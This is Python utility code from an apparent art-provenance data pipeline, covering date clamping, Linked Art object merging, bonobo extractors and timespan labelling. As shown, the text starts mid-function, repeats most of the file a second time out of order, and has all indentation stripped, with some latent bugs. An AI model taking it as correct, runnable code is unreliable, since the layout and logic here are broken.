return '%04d-%02d-%02d' % (int(year), month, day)
else:
return '%04d' % (int(year),)
max_day = calendar.monthrange(year, month)[1]
try:
day = int(day)
if day < 1 or day > 31:
raise ValueError(f'Day value is not valid: {day}')
if clamp == 'eoe':
day += 1
if day > max_day:
day = 1
month += 1
if month > 12:
month = 1
year += 1
except Exception as e:
if clamp == 'begin':
day = 1
elif clamp == 'end':
day = max_day
elif clamp == 'eoe':
day = 1
month += 1
if month > 12:
month = 1
year += 1
else:
if type(e) not in (TypeError, ValueError):
warnings.warn(f'Failed to interpret day value {day!r} in implode_date: {e}')
pprint.pprint(data, stream=sys.stderr)
try:
if year and month and day:
return '%04d-%02d-%02d' % (int(year), month, day)
elif year and month:
return '%04d-%02d' % (int(year), month)
elif year:
return '%04d' % (int(year),)
except TypeError as e:
warnings.warn(f'*** {e}: {pprint.pformat([int(year), month, day])}')
return None
def implode_uncertain_date_tuple(date_tuple, clamp):
'''
Similar to `implode_date_tuple`, returns an ISO 8601 date string based
on the supplied date tuple. However, this method will handle date tuples
with zero-valued day or month fields.
'''
year, month, day = date_tuple
try:
year = int(year)
except:
warnings.warn('year is not numeric')
return None
try:
month = int(month)
if month < 0 or month > 12:
raise ValueError(f'Month value is not valid: {month}')
except Exception as e:
if clamp == 'begin':
day = day if month == 0 else 1 # keep the day value if there's month uncertainty
month = 1
elif clamp in ('end', 'eoe'):
day = day if month == 0 else 31 # keep the day value if there's month uncertainty
month = 12
else:
warnings.warn('month is not valid numeric')
return None
if month == 0:
max_day = 31
if clamp in ('end', 'eoe'):
month = 12
else:
month = 1
else:
max_day = calendar.monthrange(year, month)[1]
try:
day = int(day)
if day == 0:
if clamp in ('end', 'eoe'):
day = max_day
else:
day = 1
elif day < 1 or day > 31:
raise ValueError(f'Day value is not valid: {day}')
if clamp == 'eoe':
day += 1
if day > max_day:
day = 1
month += 1
if month > 12:
month = 1
year += 1
except Exception as e:
if clamp == 'begin':
day = 1
elif clamp == 'end':
day = max_day
elif clamp == 'eoe':
day = 1
month += 1
if month > 12:
month = 1
year += 1
else:
if type(e) not in (TypeError, ValueError):
warnings.warn(f'Failed to interpret day value {day!r} in implode_date: {e}')
pprint.pprint(data, stream=sys.stderr)
try:
if day:
return '%04d-%02d-%02d' % (int(year), month, day)
elif month:
return '%04d-%02d' % (int(year), month)
elif year:
return '%04d' % (int(year),)
except TypeError as e:
warnings.warn(f'*** {e}: {pprint.pformat([int(year), month, day])}')
warnings.warn('fallthrough')
return None
def implode_date(data:dict, prefix:str='', clamp:str=None):
'''
Given a dict `data` and a string `prefix`, extract year, month, and day elements
from `data` (with `extract_date_tuple`), and return an ISO 8601 date string
('YYYY-MM-DD') using `implode_date_tuple`.
'''
date_tuple = extract_date_tuple(data, prefix)
return implode_date_tuple(date_tuple, clamp)
class ExclusiveValue(ContextDecorator):
_locks = {}
lock = Lock()
def __init__(self, wrapped):
self._wrapped = wrapped
def get_lock(self):
_id = self._wrapped
with ExclusiveValue.lock:
if not _id in ExclusiveValue._locks:
ExclusiveValue._locks[_id] = Lock()
return ExclusiveValue._locks[_id]
def __enter__(self):
self.get_lock().acquire()
return self._wrapped
def __exit__(self, *exc):
self.get_lock().release()
def configured_arches_writer():
return pipeline.io.arches.ArchesWriter(
endpoint=settings.arches_endpoint,
auth_endpoint=settings.arches_auth_endpoint,
username=settings.arches_endpoint_username,
password=settings.arches_endpoint_password,
client_id=settings.arches_client_id
)
class CromObjectMerger:
def __init__(self):
self.attribute_based_identity = {
# NOTE: It's important that these attribute-based identity rules are
# based on crom classes that will not be top-level resources in Arches.
# That is, they must only be referenced from within a top-level
# resource, and not across resource boundaries. This is because during a
# merge, only one value will be presersved for non-multiple properties
# that differ between input objects such as `id` (and so anything
# referencing an `id` value that is dropped will be left with a dangling
# pointer).
'content': (model.Name, model.Identifier),
'value': (model.Dimension,),
}
self.metatyped_attribute_based_identity = {
# This is similar to `self.attribute_based_identity`, but instead of being
# based on the `type` of the object, it is based on the meta-type value
# (the `obj.classified_as.classified_as` value)
# of the object
'content': (vocab._BriefText,),
}
# instead of mapping to a tuple of classes, `self._metatyped_attribute_based_identity`
# maps to a list of sets of URIs (the set of classifications that must be present to be
# interpreted as a member of the class)
self._metatyped_attribute_based_identity = {}
for attr, classes in self.metatyped_attribute_based_identity.items():
id_sets = []
for c in classes:
o = c()
ids = {mt.id for cl in o.classified_as for mt in getattr(cl, 'classified_as', [])}
id_sets.append(ids)
self._metatyped_attribute_based_identity[attr] = id_sets
def merge(self, obj, *to_merge):
if not to_merge:
return obj
# print(f'merge called with {1+len(to_merge)} objects: ({obj}, {to_merge})')
for m in to_merge:
if obj == m:
continue
for p in m.list_my_props():
try:
value = getattr(m, p)
if value is not None:
if isinstance(value, list):
self.set_or_merge(obj, p, *value)
else:
self.set_or_merge(obj, p, value)
except AttributeError:
pass
return obj
def _classify_values(self, values, identified, unidentified):
for v in values:
handled = False
for attr, classes in self.attribute_based_identity.items():
if isinstance(v, classes) and hasattr(v, attr):
identified[getattr(v, attr)].append(v)
handled = True
break
for attr, id_sets in self._metatyped_attribute_based_identity.items():
if handled:
break
if hasattr(v, 'classified_as') and hasattr(v, attr):
obj_ids = {mt.id for cl in v.classified_as for mt in getattr(cl, 'classified_as', [])}
for id_set in id_sets:
if id_set <= obj_ids:
identified[getattr(v, attr)].append(v)
handled = True
break
if not handled:
try:
i = v.id
if i:
identified[i].append(v)
else:
unidentified.append(v)
except AttributeError:
unidentified.append(v)
if len(identified) > 1 and UNKNOWN_DIMENSION in identified:
# drop the Unknown physical dimension (300055642)
del(identified[UNKNOWN_DIMENSION])
def set_or_merge(self, obj, p, *values):
if p == 'type':
# print('*** TODO: calling setattr(_, "type") on crom objects throws; skipping')
return
existing = []
try:
e = getattr(obj, p)
if isinstance(e, list):
existing = e
else:
existing = [e]
except AttributeError:
pass
identified = defaultdict(list)
unidentified = []
self._classify_values(values, identified, unidentified)
allows_multiple = obj.allows_multiple(p)
if identified:
# there are values in the new objects that have to be merged with existing identifiable values
self._classify_values(existing, identified, unidentified)
setattr(obj, p, None) # clear out all the existing values
if allows_multiple:
for _, v in sorted(identified.items()):
setattr(obj, p, self.merge(*v))
for v in unidentified:
setattr(obj, p, v)
else:
try:
identified_values = sorted(identified.values())[0]
except TypeError:
# in case the values cannot be sorted
identified_values = list(identified.values())[0]
setattr(obj, p, self.merge(*identified_values))
if unidentified:
warnings.warn(f'*** Dropping {len(unidentified)} unidentified values for property {p} of {obj}')
# unidentified_value = sorted(unidentified)[0]
# setattr(obj, p, unidentified_value)
else:
# there are no identifiable values in the new objects, so we can just append them
if allows_multiple:
for v in unidentified:
setattr(obj, p, v)
else:
if unidentified:
if len(unidentified) > 1:
warnings.warn(f'*** Dropping {len(unidentified)-1} extra unidentified values for property {p} of {obj}')
try:
if hasattr(obj, p):
values = set(unidentified + [getattr(obj, p)])
else:
values = set(unidentified)
value = sorted(values)[0]
except TypeError:
# in case the values cannot be sorted
value = unidentified[0]
setattr(obj, p, None)
setattr(obj, p, value)
class ExtractKeyedValues(Configurable):
'''
Given a `dict` representing an some object, extract an array of `dict` values from
the `key` member. To each of the extracted dictionaries, add a 'parent_data' key with
the value of the original dictionary. Yield each extracted dictionary.
'''
key = Option(str, required=True)
include_parent = Option(bool, default=True)
def __init__(self, *v, **kw):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(*v, **kw)
self.__name__ = f'{type(self).__name__} ({self.key})'
def __call__(self, data, *args, **kwargs):
for a in data.get(self.key, []):
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
class ExtractKeyedValue(Configurable):
'''
Given a `dict` representing an some object, extract the `key` member (a dict).
To the extracted dictionaries, add a 'parent_data' key with
the value of the original dictionary. Yield the extracted dictionary.
'''
key = Option(str, required=True)
include_parent = Option(bool, default=True)
def __init__(self, *v, **kw):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(*v, **kw)
self.__name__ = f'{type(self).__name__} ({self.key})'
def __call__(self, data, *args, **kwargs):
a = data.get(self.key)
if a:
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
class RecursiveExtractKeyedValue(ExtractKeyedValue):
include_self = Option(bool, default=True)
def __call__(self, data, *args, **kwargs):
if self.include_self:
a = data
else:
a = data.get(self.key)
while a:
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
data = a
a = a.get(self.key)
class MatchingFiles(Configurable):
'''
Given a path and a pattern, yield the names of all files in the path that match the pattern.
'''
path = Option(str)
pattern = Option(default='*')
fs = Service(
'fs',
__doc__='''The filesystem instance to use.''',
) # type: str
def __init__(self, *args, **kwargs):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(self, *args, **kwargs)
self.__name__ = f'{type(self).__name__} ({self.pattern})'
def __call__(self, *, fs, **kwargs):
count = 0
if not self.pattern:
return
# print(repr(self.pattern))
subpath, pattern = os.path.split(self.pattern)
fullpath = os.path.join(self.path, subpath)
for f in sorted(fs.listdir(fullpath)):
if fnmatch.fnmatch(f, pattern):
yield os.path.join(subpath, f)
count += 1
if not count:
sys.stderr.write(f'*** No files matching {pattern} found in {fullpath}\n')
def make_ordinal(n):
n = int(n)
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return f'{n}{suffix}'
def timespan_for_century(century, narrow=False, inclusive=False, **kwargs):
'''
Given a integer representing a century (e.g. 17 for the 17th century), return a
TimeSpan object for the bounds of that century.
If `narrow` is True, the bounding properties will be `end_of_the_begin` and
`begin_of_the_end`; otherwise they will be `begin_of_the_begin` and `end_of_the_end`.
'''
ord = make_ordinal(century)
ts = model.TimeSpan(ident='', label=f'{ord} century')
from_year = 100 * (century-1)
to_year = from_year + 100
if narrow:
ts.end_of_the_begin = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (from_year, 1, 1, 0, 0, 0)
ts.begin_of_the_end = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (to_year, 1, 1, 0, 0, 0)
else:
ts.begin_of_the_begin = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (from_year, 1, 1, 0, 0, 0)
ts.end_of_the_end = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (to_year, 1, 1, 0, 0, 0)
return ts
def dates_for_century(century):
'''
Given a integer representing a century (e.g. 17 for the 17th century), return a
tuple of dates for the bounds of that century.
'''
ord = make_ordinal(century)
ts = model.TimeSpan(ident='', label=f'{ord} century')
from_year = 100 * (century-1)
to_year = from_year + 100
begin = datetime.datetime(from_year, 1, 1)
end = datetime.datetime(to_year, 1, 1)
return (begin, end)
def timespan_before(after):
ts = model.TimeSpan(ident='')
try:
ts.end_of_the_end = after.begin_of_the_begin
with suppress(AttributeError):
l = f'Before {after._label}'
l.identified_by = model.Name(ident='', content=l)
ts._label = l
return ts
except AttributeError:
return None
def timespan_after(before):
ts = model.TimeSpan(ident='')
try:
ts.begin_of_the_begin = before.end_of_the_end
with suppress(AttributeError):
l = f'After {before._label}'
l.identified_by = model.Name(ident='', content=l)
ts._label = l
return ts
except AttributeError:
return None
def replace_key_pattern(pat, rep, value):
r = re.compile(pat)
d = {}
for k, v in value.items():
m = r.search(k)
if m:
d[k.replace(m.group(1), rep, 1)] = v
else:
d[k] = v
return d
def strip_key_prefix(prefix, value):
'''
Strip the given `prefix` string from the beginning of all keys in the supplied `value`
dict, returning a copy of `value` with the new keys.
'''
d = {}
for k, v in value.items():
if k.startswith(prefix):
d[k.replace(prefix, '', 1)] = v
else:
d[k] = v
return d
def label_for_timespan_range(begin, end, inclusive=False):
'''
Returns a human-readable string for labeling the timespan with the given bounds.
The {inclusive} indicates if the upper bound given by {end} is inclusive or exclusive.
If {end} is exclusive, the label will take this into account in creating a
human-readable string. For example, if the upper bound was '2019-12-01', exclusive,
the human-readable label should indicate the timespan ending at the end of November.
'''
if begin and end:
pass
elif begin:
return f'{begin} onwards'
elif end:
return f'up to {end}'
if begin == end:
return begin
if isinstance(begin, datetime.datetime):
begin = begin.strftime("%Y-%m-%d")
if isinstance(end, datetime.datetime):
end = end.strftime("%Y-%m-%d")
orig_begin = begin
orig_end = end
if begin.count('-') != 2:
if not inclusive:
raise Exception(f'truncated date strings must operate in inclusive mode in label_for_timespan_range: {begin}')
begin = implode_date(dict(zip(('year', 'month', 'day'), (begin.split('-', 3) + ['', '', ''])[:3])), clamp='begin')
if end.count('-') != 2:
if not inclusive:
raise Exception(f'truncated date strings must operate in inclusive mode in label_for_timespan_range: {end}')
end = implode_date(dict(zip(('year', 'month', 'day'), (end.split('-', 3) + ['', '', ''])[:3])), clamp='end' if inclusive else 'eoe')
beginparts = list(map(int, begin.split('-')))
endparts = list(map(int, end.split('-')))
from_y, from_m, from_d = beginparts
to_y, to_m, to_d = endparts
if inclusive:
maxday = calendar.monthrange(to_y, to_m)[1]
if from_y == to_y and from_m == to_m and from_d == 1 and to_d == maxday:
# 1 month range
return '%04d-%02d' % (from_y, from_m)
elif from_y == to_y and from_m == 1 and to_m == 12 and from_d == 1 and to_d == 31:
# 1 year range
return str(from_y)
else:
return f'{orig_begin} to {orig_end}'
else:
if from_y == to_y and from_m == to_m and from_d == to_d - 1:
# 1 day range
return begin
elif from_y == to_y and from_m == to_m - 1 and from_d == to_d and to_d == 1:
# 1 month range
return '%04d-%02d' % (from_y, from_m)
elif from_y == to_y - 1 and from_m == to_m and to_m == 1 and from_d == to_d and to_d == 1:
# 1 year range
return str(from_y)
else:
to_d -= 1
if to_d == 0:
to_m -= 1
if to_m == 0:
to_m = 12
to_y -= 1
to_d = calendar.monthrange(to_y, to_m)[1]
end = '%04d-%02d-%02d' % (to_y, to_m, to_d)
return f'{begin} to {end}'
def exploded_date_has_uncertainty(date_tuple):
year, month, day = date_tuple
try:
year = int(year)
month = int(month)
day = int(day)
if month == 0 or day == 0:
return True
except:
pass
return False
def timespan_from_bound_components(data:dict, begin_prefix:str='', begin_clamp:str=None, end_prefix:str='', end_clamp:str=None):
begin_tuple = extract_date_tuple(data, begin_prefix)
end_tuple = extract_date_tuple(data, end_prefix)
uncertain_dates = [exploded_date_has_uncertainty(t) for t in (begin_tuple, end_tuple)]
uncertain_date = any(uncertain_dates)
uncertain_tuple = begin_tuple if uncertain_dates[0] else end_tuple
if uncertain_date:
begin = implode_uncertain_date_tuple(uncertain_tuple, clamp=begin_clamp)
end = implode_uncertain_date_tuple(uncertain_tuple, clamp=end_clamp)
# # for dates with a '00' for month, the end day will already be
# incremented by implode_uncertain_date_tuple with end_clamp='eoe'
inclusive = end_clamp != 'eoe'
ts = timespan_from_outer_bounds(
begin=begin,
end=end,
inclusive=inclusive
)
else:
begin = implode_date_tuple(begin_tuple, clamp=begin_clamp)
end = implode_date_tuple(end_tuple, clamp=end_clamp)
# we use inclusive=False here, because clamping in the implode_date_tuple
# call will have already handled adjusting the date to handle the 'eoe'
# case (unlike the if case above, where we have to base inclusivity on
# the clamp value)
ts = timespan_from_outer_bounds(
begin=begin,
end=end,
inclusive=False
)
if end_clamp == 'eoe':
end_label = implode_date_tuple(end_tuple, clamp='end')
else:
end_label = end
if uncertain_date:
# attach an Identifier to the timespan that includes the original
# verbatim string values that include the '00' field values
ident_parts = []
begin_str = '-'.join([c for c in begin_tuple if len(c)])
end_str = '-'.join([c for c in end_tuple if len(c)])
uncertain_str = begin_str if uncertain_dates[0] else end_str
# Note: This will use the verbatim string from the uncertain date
# (either begin or end).
ts.identified_by = model.Name(ident='', content=f'{uncertain_str}')
else:
if begin and end:
ts.identified_by = model.Name(ident='', content=f'{begin} to {end_label}')
elif begin:
ts.identified_by = model.Name(ident='', content=f'{begin} onwards')
elif end:
ts.identified_by = model.Name(ident='', content=f'up to {end_label}')
return ts, begin, end
def timespan_from_outer_bounds(begin=None, end=None, inclusive=False):
'''
Return a `TimeSpan` based on the (optional) `begin` and `end` date strings.
If both `begin` and `end` are `None`, returns `None`.
'''
if begin or end:
ts = model.TimeSpan(ident='')
ts._label = label_for_timespan_range(begin, end, inclusive=inclusive)
if begin is not None:
try:
if not isinstance(begin, datetime.datetime):
begin = dateutil.parser.parse(begin)
begin = begin.strftime("%Y-%m-%dT%H:%M:%SZ")
ts.begin_of_the_begin = begin
except ValueError:
warnings.warn(f'*** failed to parse begin date: {begin}')
raise
if end is not None:
try:
if not isinstance(end, datetime.datetime):
end = dateutil.parser.parse(end)
if inclusive:
end += datetime.timedelta(days=1)
end = end.strftime("%Y-%m-%dT%H:%M:%SZ")
ts.end_of_the_end = end
except ValueError:
warnings.warn(f'*** failed to parse end date: {end}')
return ts
return None
class CaseFoldingSet(set):
def __init__(self, iterable):
super().__init__(self)
for v in iterable:
self.add(v)
def __and__(self, value):
return CaseFoldingSet({s for s in value if s in self})
def __or__(self, value):
s = CaseFoldingSet({})
for v in self:
s.add(v)
for v in value:
s.add(v)
return s
def add(self, v):
super().add(v.casefold())
def remove(self, v):
super().remove(v.casefold())
def __contains__(self, v):
return super().__contains__(v.casefold())
def intersects(self, values):
if isinstance(values, CaseFoldingSet):
l = set(self)
r = set(values)
return l & r
else:
for v in values:
if v in self:
return True
return False
def truncate_with_ellipsis(s, length=100):
'''
If the string is too long to represent as a title-like identifier, return a new,
truncated string with a trailing ellipsis that can be used as a title (with the
assumption that the long original value will be represented as a more suitable
string such as a description).
'''
if not isinstance(s, str):
return None
if len(s) <= length:
return None
shorter = ' '.join(s[:length].split(' ')[0:-1]) + '…'
if len(shorter) == 1:
# breaking on spaces did not yield a shorter string;
# {s} must start with at least 100 non-space characters
shorter = s[:length-1] + '…'
return shorter
class GraphListSource:
'''
Act as a bonobo graph source node for a set of crom objects.
Yields the supplied objects wrapped in data dicts.
'''
def __init__(self, values, *args, **kwargs):
super().__init__(*args, **kwargs)
self.values = values
def __call__(self):
for v in self.values:
yield add_crom_data({}, v)
def rename_keys(mapping:dict):
return lambda d, p: {mapping[k] if k in mapping else k: v for k, v in d.items()}
def _as_list(data):
if isinstance(data, list):
return data
elif data is None:
return []
else:
return [data]
| import re
import os
import sys
import fnmatch
import pprint
import calendar
import datetime
from threading import Lock
from contextlib import ContextDecorator, suppress
from collections import defaultdict, namedtuple
import warnings
import dateutil.parser
from bonobo.config import Configurable, Option, Service
import settings
import pipeline.io.arches
from cromulent import model, vocab
from cromulent.model import factory, BaseResource
from pipeline.linkedart import add_crom_data
UNKNOWN_DIMENSION = 'http://vocab.getty.edu/aat/300055642'
# Dimension = namedtuple("Dimension", [
# 'value', # numeric value
# 'unit', # unit
# 'which' # e.g. width, height, ...
# ])
#
def identity(d):
'''
Simply yield the value that is passed as an argument.
This is trivial, but necessary for use in constructing some bonobo graphs.
For example, if two already instantiated graph chains need to be connected,
one being used as input to the other, bonobo does not allow this:
`graph.add_chain(_input=prefix.output, _output=suffix.input)`
Instead, the `add_chain` call requires at least one graph node to be added. Hence:
`graph.add_chain(identity, _input=prefix.output, _output=suffix.input)`
'''
yield d
def extract_date_tuple(data:dict, prefix:str=''):
'''
Given a dict `data` and a string `prefix`, extract year, month, and day elements
from `data` (e.g. '{prefix}year', '{prefix}month', and '{prefix}day'), and return
them as a tuple.
'''
year = data.get(f'{prefix}year')
month = data.get(f'{prefix}month', data.get(f'{prefix}mo'))
day = data.get(f'{prefix}day')
return (year, month, day)
def implode_date_tuple(date_tuple, clamp):
'''
Given a date string tuple `(year, month, day)`, return an ISO 8601 date
string ('YYYY-MM-DD'). If the day, or day and month elements are missing,
may also return a year-month ('YYYY-MM') or year ('YYYY') string.
If `clamp='begin'` and a year value is found, the resulting date string will use
the earliest valid value for any field (month or day) that is not present or false.
For example, '1800-02' would become '1800-02-01'.
If `clamp='end'`, clamping occurs using the latest valid values. For example,
'1800-02' would become '1800-02-28'.
If `clamp='eoe'` ('end of the end'), clamping occurs using the first value that is
*not* valid. That is, the returned value may be used as an exclusive endpoint for a
date range. For example, '1800-02' would become '1800-03-01'.
'''
year, month, day = date_tuple
try:
year = int(year)
except:
return None
try:
month = int(month)
if month < 1 or month > 12:
raise ValueError(f'Month value is not valid: {month}')
except Exception as e:
if clamp == 'begin':
month = 1
day = 1
return '%04d-%02d-%02d' % (int(year), month, day)
elif clamp == 'end':
day = 31
month = 12
return '%04d-%02d-%02d' % (int(year), month, day)
elif clamp == 'eoe':
day = 1
month = 1
year += 1
return '%04d-%02d-%02d' % (int(year), month, day)
else:
return '%04d' % (int(year),)
max_day = calendar.monthrange(year, month)[1]
try:
day = int(day)
if day < 1 or day > 31:
raise ValueError(f'Day value is not valid: {day}')
if clamp == 'eoe':
day += 1
if day > max_day:
day = 1
month += 1
if month > 12:
month = 1
year += 1
except Exception as e:
if clamp == 'begin':
day = 1
elif clamp == 'end':
day = max_day
elif clamp == 'eoe':
day = 1
month += 1
if month > 12:
month = 1
year += 1
else:
if type(e) not in (TypeError, ValueError):
warnings.warn(f'Failed to interpret day value {day!r} in implode_date: {e}')
pprint.pprint(data, stream=sys.stderr)
try:
if year and month and day:
return '%04d-%02d-%02d' % (int(year), month, day)
elif year and month:
return '%04d-%02d' % (int(year), month)
elif year:
return '%04d' % (int(year),)
except TypeError as e:
warnings.warn(f'*** {e}: {pprint.pformat([int(year), month, day])}')
return None
def implode_uncertain_date_tuple(date_tuple, clamp):
'''
Similar to `implode_date_tuple`, returns an ISO 8601 date string based
on the supplied date tuple. However, this method will handle date tuples
with zero-valued day or month fields.
'''
year, month, day = date_tuple
try:
year = int(year)
except:
warnings.warn('year is not numeric')
return None
try:
month = int(month)
if month < 0 or month > 12:
raise ValueError(f'Month value is not valid: {month}')
except Exception as e:
if clamp == 'begin':
day = day if month == 0 else 1 # keep the day value if there's month uncertainty
month = 1
elif clamp in ('end', 'eoe'):
day = day if month == 0 else 31 # keep the day value if there's month uncertainty
month = 12
else:
warnings.warn('month is not valid numeric')
return None
if month == 0:
max_day = 31
if clamp in ('end', 'eoe'):
month = 12
else:
month = 1
else:
max_day = calendar.monthrange(year, month)[1]
try:
day = int(day)
if day == 0:
if clamp in ('end', 'eoe'):
day = max_day
else:
day = 1
elif day < 1 or day > 31:
raise ValueError(f'Day value is not valid: {day}')
if clamp == 'eoe':
day += 1
if day > max_day:
day = 1
month += 1
if month > 12:
month = 1
year += 1
except Exception as e:
if clamp == 'begin':
day = 1
elif clamp == 'end':
day = max_day
elif clamp == 'eoe':
day = 1
month += 1
if month > 12:
month = 1
year += 1
else:
if type(e) not in (TypeError, ValueError):
warnings.warn(f'Failed to interpret day value {day!r} in implode_date: {e}')
pprint.pprint(data, stream=sys.stderr)
try:
if day:
return '%04d-%02d-%02d' % (int(year), month, day)
elif month:
return '%04d-%02d' % (int(year), month)
elif year:
return '%04d' % (int(year),)
except TypeError as e:
warnings.warn(f'*** {e}: {pprint.pformat([int(year), month, day])}')
warnings.warn('fallthrough')
return None
def implode_date(data:dict, prefix:str='', clamp:str=None):
'''
Given a dict `data` and a string `prefix`, extract year, month, and day elements
from `data` (with `extract_date_tuple`), and return an ISO 8601 date string
('YYYY-MM-DD') using `implode_date_tuple`.
'''
date_tuple = extract_date_tuple(data, prefix)
return implode_date_tuple(date_tuple, clamp)
class ExclusiveValue(ContextDecorator):
_locks = {}
lock = Lock()
def __init__(self, wrapped):
self._wrapped = wrapped
def get_lock(self):
_id = self._wrapped
with ExclusiveValue.lock:
if not _id in ExclusiveValue._locks:
ExclusiveValue._locks[_id] = Lock()
return ExclusiveValue._locks[_id]
def __enter__(self):
self.get_lock().acquire()
return self._wrapped
def __exit__(self, *exc):
self.get_lock().release()
def configured_arches_writer():
return pipeline.io.arches.ArchesWriter(
endpoint=settings.arches_endpoint,
auth_endpoint=settings.arches_auth_endpoint,
username=settings.arches_endpoint_username,
password=settings.arches_endpoint_password,
client_id=settings.arches_client_id
)
class CromObjectMerger:
def __init__(self):
self.attribute_based_identity = {
# NOTE: It's important that these attribute-based identity rules are
# based on crom classes that will not be top-level resources in Arches.
# That is, they must only be referenced from within a top-level
# resource, and not across resource boundaries. This is because during a
# merge, only one value will be presersved for non-multiple properties
# that differ between input objects such as `id` (and so anything
# referencing an `id` value that is dropped will be left with a dangling
# pointer).
'content': (model.Name, model.Identifier),
'value': (model.Dimension,),
}
self.metatyped_attribute_based_identity = {
# This is similar to `self.attribute_based_identity`, but instead of being
# based on the `type` of the object, it is based on the meta-type value
# (the `obj.classified_as.classified_as` value)
# of the object
'content': (vocab._BriefText,),
}
# instead of mapping to a tuple of classes, `self._metatyped_attribute_based_identity`
# maps to a list of sets of URIs (the set of classifications that must be present to be
# interpreted as a member of the class)
self._metatyped_attribute_based_identity = {}
for attr, classes in self.metatyped_attribute_based_identity.items():
id_sets = []
for c in classes:
o = c()
ids = {mt.id for cl in o.classified_as for mt in getattr(cl, 'classified_as', [])}
id_sets.append(ids)
self._metatyped_attribute_based_identity[attr] = id_sets
def merge(self, obj, *to_merge):
if not to_merge:
return obj
# print(f'merge called with {1+len(to_merge)} objects: ({obj}, {to_merge})')
for m in to_merge:
if obj == m:
continue
for p in m.list_my_props():
try:
value = getattr(m, p)
if value is not None:
if isinstance(value, list):
self.set_or_merge(obj, p, *value)
else:
self.set_or_merge(obj, p, value)
except AttributeError:
pass
return obj
def _classify_values(self, values, identified, unidentified):
for v in values:
handled = False
for attr, classes in self.attribute_based_identity.items():
if isinstance(v, classes) and hasattr(v, attr):
identified[getattr(v, attr)].append(v)
handled = True
break
for attr, id_sets in self._metatyped_attribute_based_identity.items():
if handled:
break
if hasattr(v, 'classified_as') and hasattr(v, attr):
obj_ids = {mt.id for cl in v.classified_as for mt in getattr(cl, 'classified_as', [])}
for id_set in id_sets:
if id_set <= obj_ids:
identified[getattr(v, attr)].append(v)
handled = True
break
if not handled:
try:
i = v.id
if i:
identified[i].append(v)
else:
unidentified.append(v)
except AttributeError:
unidentified.append(v)
if len(identified) > 1 and UNKNOWN_DIMENSION in identified:
# drop the Unknown physical dimension (300055642)
del(identified[UNKNOWN_DIMENSION])
def set_or_merge(self, obj, p, *values):
if p == 'type':
# print('*** TODO: calling setattr(_, "type") on crom objects throws; skipping')
return
existing = []
try:
e = getattr(obj, p)
if isinstance(e, list):
existing = e
else:
existing = [e]
except AttributeError:
pass
identified = defaultdict(list)
unidentified = []
self._classify_values(values, identified, unidentified)
allows_multiple = obj.allows_multiple(p)
if identified:
# there are values in the new objects that have to be merged with existing identifiable values
self._classify_values(existing, identified, unidentified)
setattr(obj, p, None) # clear out all the existing values
if allows_multiple:
for _, v in sorted(identified.items()):
setattr(obj, p, self.merge(*v))
for v in unidentified:
setattr(obj, p, v)
else:
try:
identified_values = sorted(identified.values())[0]
except TypeError:
# in case the values cannot be sorted
identified_values = list(identified.values())[0]
setattr(obj, p, self.merge(*identified_values))
if unidentified:
warnings.warn(f'*** Dropping {len(unidentified)} unidentified values for property {p} of {obj}')
# unidentified_value = sorted(unidentified)[0]
# setattr(obj, p, unidentified_value)
else:
# there are no identifiable values in the new objects, so we can just append them
if allows_multiple:
for v in unidentified:
setattr(obj, p, v)
else:
if unidentified:
if len(unidentified) > 1:
warnings.warn(f'*** Dropping {len(unidentified)-1} extra unidentified values for property {p} of {obj}')
try:
if hasattr(obj, p):
values = set(unidentified + [getattr(obj, p)])
else:
values = set(unidentified)
value = sorted(values)[0]
except TypeError:
# in case the values cannot be sorted
value = unidentified[0]
setattr(obj, p, None)
setattr(obj, p, value)
class ExtractKeyedValues(Configurable):
'''
Given a `dict` representing an some object, extract an array of `dict` values from
the `key` member. To each of the extracted dictionaries, add a 'parent_data' key with
the value of the original dictionary. Yield each extracted dictionary.
'''
key = Option(str, required=True)
include_parent = Option(bool, default=True)
def __init__(self, *v, **kw):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(*v, **kw)
self.__name__ = f'{type(self).__name__} ({self.key})'
def __call__(self, data, *args, **kwargs):
for a in data.get(self.key, []):
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
class ExtractKeyedValue(Configurable):
'''
Given a `dict` representing an some object, extract the `key` member (a dict).
To the extracted dictionaries, add a 'parent_data' key with
the value of the original dictionary. Yield the extracted dictionary.
'''
key = Option(str, required=True)
include_parent = Option(bool, default=True)
def __init__(self, *v, **kw):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(*v, **kw)
self.__name__ = f'{type(self).__name__} ({self.key})'
def __call__(self, data, *args, **kwargs):
a = data.get(self.key)
if a:
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
class RecursiveExtractKeyedValue(ExtractKeyedValue):
include_self = Option(bool, default=True)
def __call__(self, data, *args, **kwargs):
if self.include_self:
a = data
else:
a = data.get(self.key)
while a:
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
data = a
a = a.get(self.key)
class MatchingFiles(Configurable):
'''
Given a path and a pattern, yield the names of all files in the path that match the pattern.
'''
path = Option(str)
pattern = Option(default='*')
fs = Service(
'fs',
__doc__='''The filesystem instance to use.''',
) # type: str
def __init__(self, *args, **kwargs):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(self, *args, **kwargs)
self.__name__ = f'{type(self).__name__} ({self.pattern})'
def __call__(self, *, fs, **kwargs):
count = 0
if not self.pattern:
return
# print(repr(self.pattern))
subpath, pattern = os.path.split(self.pattern)
